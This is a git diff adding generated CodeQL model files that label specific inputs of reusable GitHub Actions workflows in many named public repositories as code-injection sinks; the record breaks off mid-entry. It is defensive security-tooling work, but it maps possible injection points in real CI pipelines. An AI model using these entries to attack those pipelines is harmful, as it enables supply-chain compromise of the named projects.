100644 index 000000000000..3c525970eccd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml new file mode 100644 index 000000000000..187b3d2fd0a7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "inputs.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml new file mode 100644 index 000000000000..3e11359c6b36 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "inputs.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml new file mode 100644 index 000000000000..50bbdaf8153d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml new file mode 100644 index 000000000000..9f30976bbadc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "inputs.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "inputs.matrix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml new file mode 100644 index 000000000000..81a419fec0d8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml new file mode 100644 index 000000000000..35fd748afbee --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml new file mode 100644 index 000000000000..192b1b608438 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml new file mode 100644 index 000000000000..5a397f743a3c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml new file mode 100644 index 000000000000..97f40ee7c07e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "inputs.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 000000000000..293939322e2b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml new file mode 100644 index 000000000000..c3aa198743d5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "inputs.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml new file mode 100644 index 000000000000..1ea78b01cd6b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "inputs.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml new file mode 100644 index 000000000000..23bd3adc5a40 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_build_type", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml new file mode 100644 index 000000000000..77c7570ec0e5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "inputs.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml new file mode 100644 index 000000000000..46cc50923557 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "inputs.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml new file mode 100644 index 000000000000..78a5584d04b4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml new file mode 100644 index 000000000000..1c3e5b565be8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml new file mode 100644 index 000000000000..7e8d8061fc5d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml new file mode 100644 index 000000000000..21e3fdb8874d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml new file mode 100644 index 000000000000..67e49a5716cb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml new file mode 100644 index 000000000000..2f30003359c4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "inputs.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "inputs.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml new file mode 100644 index 000000000000..ed9091f37aed --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "inputs.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml new file mode 100644 index 000000000000..d940c6a98b03 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "inputs.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml new file mode 100644 index 000000000000..57b56667fbe9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml new file mode 100644 index 000000000000..4ffee539cd43 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_types", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml new file mode 100644 index 000000000000..bfe525b2c0e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "inputs.board", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml new file mode 100644 index 000000000000..647bd0ae1939 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "inputs.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml new file mode 100644 index 000000000000..b09fcb7f1026 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "inputs.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml new file mode 100644 index 000000000000..f83101f511c6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "inputs.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml new file mode 100644 index 000000000000..7a60c93516de --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml new file mode 100644 index 000000000000..14d7e741dac1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "inputs.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml new file mode 100644 index 000000000000..bb0e3a6a2b6b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "inputs.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml new file mode 100644 index 000000000000..aa8f4e6b5186 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.reactNativeWindowsVersion", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml new file mode 100644 index 000000000000..c9af1a40ddc2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "inputs.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml new file mode 100644 index 000000000000..863bc645d989 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.kinds", 